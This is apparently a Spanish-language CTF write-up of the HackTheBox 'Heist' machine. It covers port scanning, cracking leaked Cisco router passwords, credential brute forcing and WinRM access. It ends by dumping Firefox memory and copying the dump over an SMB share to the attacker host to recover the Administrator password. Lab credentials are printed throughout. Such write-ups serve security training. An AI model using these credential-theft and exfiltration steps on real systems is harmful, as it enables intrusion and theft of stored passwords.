$

Heist

2025-01-03 · #ctf#hackthebox#windows

Heist
Sistema operativo Dificultad Fecha de Lanzamiento Creador
Windows Easy 10 Agosto 2019 MinatoTW

Reconocimiento

Lanzamos una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.

heist

Enumeración inicial

Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima. 

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.149  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 22:07 -03
Initiating SYN Stealth Scan at 22:07
Scanning 10.10.10.149 [65535 ports]
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Discovered open port 49669/tcp on 10.10.10.149
Discovered open port 5985/tcp on 10.10.10.149
Completed SYN Stealth Scan at 22:08, 26.51s elapsed (65535 total ports)
Nmap scan report for 10.10.10.149
Host is up, received user-set (0.15s latency).
Scanned at 2025-01-03 22:07:56 -03 for 26s
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      REASON
80/tcp    open  http         syn-ack ttl 127
135/tcp   open  msrpc        syn-ack ttl 127
445/tcp   open  microsoft-ds syn-ack ttl 127
5985/tcp  open  wsman        syn-ack ttl 127
49669/tcp open  unknown      syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.58 seconds
           Raw packets sent: 131083 (5.768MB) | Rcvd: 23 (1.012KB)

Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.

nmap -sCV -p 80,135,445,5985,49669 -oN servicesScan -vvv 10.10.10.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 22:08 -03
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:08
Completed NSE at 22:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:08
Completed NSE at 22:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:08
Completed NSE at 22:08, 0.00s elapsed
Initiating Ping Scan at 22:08
Scanning 10.10.10.149 [4 ports]
Completed Ping Scan at 22:08, 0.18s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:08
Completed Parallel DNS resolution of 1 host. at 22:08, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:08
Scanning 10.10.10.149 (10.10.10.149) [5 ports]
Discovered open port 49669/tcp on 10.10.10.149
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 5985/tcp on 10.10.10.149
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Completed SYN Stealth Scan at 22:08, 0.18s elapsed (5 total ports)
Initiating Service scan at 22:08
Scanning 5 services on 10.10.10.149 (10.10.10.149)
Completed Service scan at 22:09, 56.18s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.10.149.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:09
NSE Timing: About 99.86% done; ETC: 22:10 (0:00:00 remaining)
Completed NSE at 22:10, 40.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:10
Completed NSE at 22:10, 0.63s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:10
Completed NSE at 22:10, 0.01s elapsed
Nmap scan report for 10.10.10.149 (10.10.10.149)
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-01-03 22:08:51 -03 for 97s

PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m03s
| smb2-time: 
|   date: 2025-01-04T01:12:54
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48515/tcp): CLEAN (Timeout)
|   Check 2 (port 23914/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 64920/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:10
Completed NSE at 22:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:10
Completed NSE at 22:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:10
Completed NSE at 22:10, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.50 seconds
           Raw packets sent: 9 (372B) | Rcvd: 6 (248B)

Explotación inicial

HTTP (80)

Si ingresamos al puerto 80, nos encontramos con la siguiente Web, donde se presenta un login para iniciar sesión.

heist

Ingresamos como invitado guest.

heist

Vemos una conversación entre el usuario Hazard y el usuario Admin. En el primer comentario del usuario Hazard se adjunta un archivo de configuración.

heist

El archivo tiene el siguiente contenido:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

Por ultimo, el usuario Hazard menciona lo siguiente:

“Thanks a lot. Also, please create an account for me on the windows server as I need to access the files.”

Crackeamos las contraseñas usando la siguiente web.

heist

heist

$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent

Crackeamos el hash $1$pdQG$o8nrSzsGXeaduXrjlvKc91 usando John.

heist

Aplicamos fuerza bruta con Netexec utilizando las contraseñas anteriores y los nombres de usuarios posibles Administrator y Hazard.

heist

Genial, descubrimos la contraseña del usuario hazard.

hazard:stealth1agent

heist

heist

Las credenciales no son validas para winrm, pero podemos aplicar un RID Brute force.

heist

Realizamos un nuevo ataque de fuerza bruta de credenciales.

heist

chase:Q4)sJu\Y8qz*A3?d

El usuario chase si puede conectarse por winrm.

heist

Leemos el flag de user.txt.

heist

Elevación de privilegios

heist

Vemos que esta corriendo Firefox, tal vez el usuario ingreso con firefox al panel y guardo las credenciales en este.

heist

Subimos la herramienta procdump.exe.

heist

heist

Creamos un recurso compartido para trasnferir el archivo.

impacket-smbserver share -username guest -password guest -smb2support .

Montamos el recurso compartido en la máquina víctima.

net use x: \\10.10.14.4\share /user:guest guest

Copiamos el archivo.

cmd /c "copy firefox.dmp X:\"

Si interceptamos la petición con BurpSuite, vemos que el campo login_password hace referencia a la contraseña.

heist

Filtramos con el comando string por el campo login_password en el archivo firefox.dmp y encontramos las credenciales.

heist

Nos conectamos como el usuario Administrator.

Administrator:4dD!5}x/re8]FBuZ

heist

Leemos el flag de root.txt.

heist